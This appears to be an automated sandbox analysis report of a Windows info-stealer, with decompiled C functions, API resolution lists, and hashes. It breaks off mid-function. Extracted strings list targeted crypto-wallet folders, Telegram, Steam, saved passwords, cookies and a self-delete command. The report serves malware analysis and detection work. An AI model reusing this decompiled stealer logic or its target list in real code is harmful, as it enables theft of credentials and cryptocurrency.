                                          0x00418c61
                                          0x00418c62
                                          0x00418c70
                                          0x00418c78
                                          0x00418c80
                                          0x00418c83
                                          0x00418c88
                                          0x00418c93
                                          0x00418ca8
                                          0x00418cba
                                          0x00418cca
                                          0x00418cd8
                                          0x00418ce6
                                          0x00418cf7
                                          0x00418d05
                                          0x00418d16
                                          0x00418d21
                                          0x00418d2e
                                          0x00418d3e
                                          0x00418d52
                                          0x00418d5e
                                          0x00418d63
                                          0x00418d63
                                          0x00418d66
                                          0x00418d67
                                          0x00418d77
                                          0x00418d88
                                          0x00418d93
                                          0x00418da0
                                          0x00418dab
                                          0x00418dba
                                          0x00418dcb
                                          0x00418dd6
                                          0x00418dd7
                                          0x00418dd8
                                          0x00418dd8
                                          0x00418ddd
                                          0x00418ddd
                                          0x00418ddd
                                          0x00000000
                                          0x004188ff
                                          0x00418902
                                          0x00418905
                                          0x00418909
                                          0x0041890b
                                          0x00418916
                                          0x00418921
                                          0x00418926
                                          0x00418926
                                          0x00418935
                                          0x00418937
                                          0x00418942
                                          0x0041894d
                                          0x00418953
                                          0x00418955
                                          0x00418955
                                          0x00418964
                                          0x00418966
                                          0x00418966
                                          0x00418975
                                          0x00418980
                                          0x004189a1
                                          0x004189a6
                                          0x004189ac
                                          0x004189ca
                                          0x004189cf
                                          0x004189d5
                                          0x004189f3
                                          0x004189f8
                                          0x004189fe
                                          0x00418a23
                                          0x00418a25
                                          0x00418a2a
                                          0x00418a2a
                                          0x00418a4f
                                          0x00418a51
                                          0x00418a56
                                          0x00418a56
                                          0x00418a65
                                          0x00418a6a
                                          0x00418a7b
                                          0x00418a7d
                                          0x00418a82
                                          0x00418a82
                                          0x00418a84
                                          0x00418a89
                                          0x00418a8c
                                          0x00418a93
                                          0x00418a93
                                          0x00418a8c
                                          0x00418aa2
                                          0x00418aa9
                                          0x00418aa9
                                          0x00418ab8
                                          0x00418ac7
                                          0x00418acc
                                          0x00418ad6
                                          0x00418ad6
                                          0x00418ae5
                                          0x00418aec
                                          0x00418aec
                                          0x00418afb
                                          0x00418afd
                                          0x00418aff
                                          0x00418b01
                                          0x00418b09
                                          0x00418b11
                                          0x00418b14
                                          0x00418b19
                                          0x00418b1b
                                          0x00418b1c
                                          0x00418b21
                                          0x00418b29
                                          0x00418b29
                                          0x00418b38
                                          0x00418b3a
                                          0x00418b3a
                                          0x00000000
                                          0x00418b38
                                          0x00418fad
                                          0x00418fad
                                          0x00418fae
                                          0x00418fae
                                          0x00418fae
                                          0x00000000
                                          0x004188e3

                                          APIs
                                          • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00418751
                                            • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?), ref: 004096BF
                                            • Part of subcall function 00409668: CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00409963,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6), ref: 0040970D
                                            • Part of subcall function 00409668: LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,?,00000000,00000000,00000000,00000000,00000000,?,004188C6,?,?,?), ref: 00409762
                                            • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 00409782
                                            • Part of subcall function 00409668: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040979C
                                          • GetSystemMetrics.USER32 ref: 00418B0C
                                          • GetSystemMetrics.USER32 ref: 00418B14
                                          • ExitProcess.KERNEL32(00000000), ref: 00419657
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Create$AddressDirectoryMetricsProcSystem$ExitLibraryLoadMutexProcess
                                          • String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<P@$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
                                          • API String ID: 2865495769-212252816
                                          • Opcode ID: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
                                          • Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
                                          • Opcode Fuzzy Hash: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
                                          • Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004065F0(void* __eax) {
                                          				short _v516;
                                          				int _t7;
                                          				void* _t12;
                                          				DWORD* _t15;
                                          
                                          				_t15 =  &_v516;
                                          				_t12 = __eax;
                                          				 *_t15 = 0xff;
                                          				_t7 = GetUserNameW( &_v516, _t15); // executed
                                          				if(_t7 == 0) {
                                          					return E00403BDC(_t12);
                                          				}
                                          				return E00403D6C(_t12, 0x100,  &_v516);
                                          			}

                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          • Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                                          • Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
                                          • Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
                                          • Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405668() {
                                          				struct HINSTANCE__* _t108;
                                          				struct HINSTANCE__* _t110;
                                          				struct HINSTANCE__* _t112;
                                          				struct HINSTANCE__* _t114;
                                          				struct HINSTANCE__* _t115;
                                          				struct HINSTANCE__* _t118;
                                          				_Unknown_base(*)()* _t119;
                                          
                                          				 *0x41c678 = LoadLibraryA("kernel32.dll");
                                          				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
                                          				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
                                          				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
                                          				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
                                          				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
                                          				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
                                          				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
                                          				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
                                          				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
                                          				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
                                          				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
                                          				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
                                          				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
                                          				 *0x41c6b0 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
                                          				 *0x41c6b4 = GetProcAddress( *0x41c678, "FindFirstFileW");
                                          				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindNextFileW");
                                          				 *0x41c6bc = GetProcAddress( *0x41c678, "LocalFree");
                                          				 *0x41c6c0 = GetProcAddress( *0x41c678, "GetTickCount");
                                          				 *0x41c6c4 = GetProcAddress( *0x41c678, "CopyFileW");
                                          				 *0x41c6c8 = GetProcAddress( *0x41c678, "FindClose");
                                          				 *0x41c6cc = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
                                          				 *0x41c6d0 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
                                          				 *0x41c6d4 = GetProcAddress( *0x41c678, "Process32FirstW");
                                          				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32NextW");
                                          				 *0x41c6dc = GetProcAddress( *0x41c678, "GetModuleFileNameW");
                                          				 *0x41c6e0 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
                                          				 *0x41c6e4 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
                                          				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocalTime");
                                          				 *0x41c6ec = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
                                          				 *0x41c6f0 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
                                          				 *0x41c6f4 = GetProcAddress( *0x41c678, "DeleteFileW");
                                          				 *0x41c6f8 = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
                                          				 *0x41c6fc = GetProcAddress( *0x41c678, "GetDriveTypeA");
                                          				 *0x41c700 = GetProcAddress( *0x41c678, "CreateProcessW");
                                          				 *0x41c704 = LoadLibraryA("advapi32.dll");
                                          				 *0x41c708 = GetProcAddress( *0x41c704, "GetUserNameW");
                                          				 *0x41c70c = GetProcAddress( *0x41c704, "RegCreateKeyExW");
                                          				 *0x41c710 = GetProcAddress( *0x41c704, "RegQueryValueExW");
                                          				 *0x41c714 = GetProcAddress( *0x41c704, "RegCloseKey");
                                          				 *0x41c718 = GetProcAddress( *0x41c704, "RegOpenKeyExW");
                                          				 *0x41c71c = GetProcAddress( *0x41c704, "AllocateAndInitializeSid");
                                          				 *0x41c720 = GetProcAddress( *0x41c704, "LookupAccountSidA");
                                          				 *0x41c724 = GetProcAddress( *0x41c704, "CreateProcessAsUserW");
                                          				 *0x41c728 = GetProcAddress( *0x41c704, "CheckTokenMembership");
                                          				 *0x41c72c = GetProcAddress( *0x41c704, "RegOpenKeyW");
                                          				 *0x41c730 = GetProcAddress( *0x41c704, "RegEnumKeyW");
                                          				 *0x41c734 = GetProcAddress( *0x41c704, "RegEnumValueW");
                                          				 *0x41c738 = GetProcAddress( *0x41c704, "CryptAcquireContextA");
                                          				 *0x41c73c = GetProcAddress( *0x41c704, "CryptCreateHash");
                                          				 *0x41c740 = GetProcAddress( *0x41c704, "CryptHashData");
                                          				 *0x41c744 = GetProcAddress( *0x41c704, "CryptGetHashParam");
                                          				 *0x41c748 = GetProcAddress( *0x41c704, "CryptDestroyHash");
                                          				 *0x41c74c = GetProcAddress( *0x41c704, "CryptReleaseContext");
                                          				 *0x41c750 = LoadLibraryA("user32.dll");
                                          				_t108 =  *0x41c750; // 0x745c0000
                                          				 *0x41c754 = GetProcAddress(_t108, "EnumDisplayDevicesW");
                                          				_t110 =  *0x41c750; // 0x745c0000
                                          				 *0x41c758 = GetProcAddress(_t110, "wvsprintfA");
                                          				_t112 =  *0x41c750; // 0x745c0000
                                          				 *0x41c75c = GetProcAddress(_t112, "GetKeyboardLayoutList");
                                          				_t114 = LoadLibraryA("shell32.dll"); // executed
                                          				 *0x41c760 = _t114;
                                          				_t115 =  *0x41c760; // 0x750f0000
                                          				 *0x41c764 = GetProcAddress(_t115, "ShellExecuteExW");
                                          				 *0x41c768 = LoadLibraryA("ntdll.dll");
                                          				_t118 =  *0x41c768; // 0x770b0000
                                          				_t119 = GetProcAddress(_t118, "RtlComputeCrc32");
                                          				 *0x41c76c = _t119;
                                          				return _t119;
                                          			}

                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418711), ref: 00405679
                                          • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
                                          • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
                                          • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
                                          • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
                                          • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
                                          • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
                                          • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
                                          • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
                                          • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
                                          • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
                                          • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
                                          • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
                                          • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
                                          • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
                                          • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
                                          • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
                                          • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
                                          • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
                                          • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
                                          • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
                                          • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
                                          • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
                                          • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
                                          • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
                                          • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
                                          • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
                                          • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
                                          • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
                                          • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
                                          • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
                                          • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
                                          • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
                                          • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
                                          • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
                                          • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
                                          • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
                                          • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
                                          • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
                                          • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
                                          • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
                                          • GetProcAddress.KERNEL32(745C0000,EnumDisplayDevicesW), ref: 00405A4E
                                          • GetProcAddress.KERNEL32(745C0000,wvsprintfA), ref: 00405A63
                                          • GetProcAddress.KERNEL32(745C0000,GetKeyboardLayoutList), ref: 00405A78
                                          • LoadLibraryA.KERNEL32(shell32.dll,745C0000,GetKeyboardLayoutList,745C0000,wvsprintfA,745C0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
                                          • GetProcAddress.KERNEL32(750F0000,ShellExecuteExW), ref: 00405A9C
                                          • LoadLibraryA.KERNEL32(ntdll.dll,750F0000,ShellExecuteExW,shell32.dll,745C0000,GetKeyboardLayoutList,745C0000,wvsprintfA,745C0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
                                          • GetProcAddress.KERNEL32(770B0000,RtlComputeCrc32), ref: 00405AC0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                          • API String ID: 2238633743-3531362093
                                          • Opcode ID: 9660b240828e0248fa2e1cbcae2f49e551ae518504ec0fd7e682362848f263d4
                                          • Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
                                          • Opcode Fuzzy Hash: 9660b240828e0248fa2e1cbcae2f49e551ae518504ec0fd7e682362848f263d4
                                          • Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00417216() {
                                          				void* _t1;
                                          				struct HINSTANCE__* _t2;
                                          				struct HINSTANCE__* _t4;
                                          				_Unknown_base(*)()* _t21;
                                          
                                          				 *0x41cb2c =  *0x41cb2c - 1;
                                          				if( *0x41cb2c < 0) {
                                          					_t2 = LoadLibraryA("crtdll.dll"); // executed
                                          					 *0x41cb04 = GetProcAddress(_t2, "wcscmp");
                                          					_t4 = LoadLibraryA("Gdiplus.dll"); // executed
                                          					 *0x41cb08 = GetProcAddress(_t4, "GdiplusStartup");
                                          					 *0x41cb0c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdiplusShutdown");
                                          					 *0x41cb10 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipCreateBitmapFromHBITMAP");
                                          					 *0x41cb14 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncodersSize");
                                          					 *0x41cb18 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipGetImageEncoders");
                                          					 *0x41cb1c = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipDisposeImage");
                                          					 *0x41cb20 = GetProcAddress(LoadLibraryA("Gdiplus.dll"), "GdipSaveImageToStream");
                                          					 *0x41cb24 = GetProcAddress(LoadLibraryA("ole32.dll"), "CreateStreamOnHGlobal");
                                          					_t21 = GetProcAddress(LoadLibraryA("ole32.dll"), "GetHGlobalFromStream");
                                          					 *0x41cb28 = _t21;
                                          					return _t21;
                                          				}
                                          				return _t1;
                                          			}

                                          APIs
                                          • LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
                                          • GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
                                          • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
                                          • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
                                          • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
                                          • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                          • API String ID: 2574300362-2815069134
                                          • Opcode ID: 3bc6c4118995df7160033985ba2e072cd86b9b17629d2e708302bb0f3277f80d
                                          • Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
                                          • Opcode Fuzzy Hash: 3bc6c4118995df7160033985ba2e072cd86b9b17629d2e708302bb0f3277f80d
                                          • Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E00417D84(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				_Unknown_base(*)()* _v20;
                                          				_Unknown_base(*)()* _v24;
                                          				_Unknown_base(*)()* _v28;
                                          				_Unknown_base(*)()* _v32;
                                          				_Unknown_base(*)()* _v36;
                                          				_Unknown_base(*)()* _v40;
                                          				_Unknown_base(*)()* _v44;
                                          				_Unknown_base(*)()* _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				void* _v68;
                                          				intOrPtr _v72;
                                          				char _v73;
                                          				signed int _v80;
                                          				char _v84;
                                          				char _v88;
                                          				char _v92;
                                          				char _v96;
                                          				char _v100;
                                          				char _v132;
                                          				char _v388;
                                          				char _v516;
                                          				char _v644;
                                          				char _v2692;
                                          				char _v3716;
                                          				char _v3776;
                                          				char _v69412;
                                          				char _v69416;
                                          				char _v69420;
                                          				char _v69424;
                                          				char _v69428;
                                          				char _v69432;
                                          				char _v69436;
                                          				char _v69440;
                                          				void* __ecx;
                                          				long _t223;
                                          				long _t290;
                                          				void* _t304;
                                          				struct HINSTANCE__* _t322;
                                          				struct HINSTANCE__* _t326;
                                          				void* _t327;
                                          				intOrPtr _t329;
                                          				intOrPtr _t353;
                                          				void* _t362;
                                          				struct _SYSTEMTIME _t373;
                                          				intOrPtr* _t375;
                                          				intOrPtr _t377;
                                          				intOrPtr _t378;
                                          				char _t393;
                                          
                                          				_t377 = _t378;
                                          				_t329 = 0x21e7;
                                          				do {
                                          					_push(0);
                                          					_push(0);
                                          					_t329 = _t329 - 1;
                                          				} while (_t329 != 0);
                                          				_t1 =  &_v8;
                                          				 *_t1 = _t329;
                                          				_v16 =  *_t1;
                                          				_v12 = __edx;
                                          				_v8 = __eax;
                                          				E00403980(_v8);
                                          				E00403980(_v12);
                                          				E00403980(_v16);
                                          				_t373 =  &_v3776;
                                          				_push(_t377);
                                          				_push(0x418292);
                                          				_push( *[fs:eax]);
                                          				 *[fs:eax] = _t378;
                                          				if(_v16 == 0) {
                                          					E0040357C( &_v16, 0x4182ac);
                                          				}
                                          				E004034E4( &_v92);
                                          				E0040357C( &_v56, _v8);
                                          				_v73 = 0;
                                          				E0040357C( &_v52, "wininet.dll");
                                          				_t326 = GetModuleHandleA(E004039E8( &_v52));
                                          				if(_t326 == 0) {
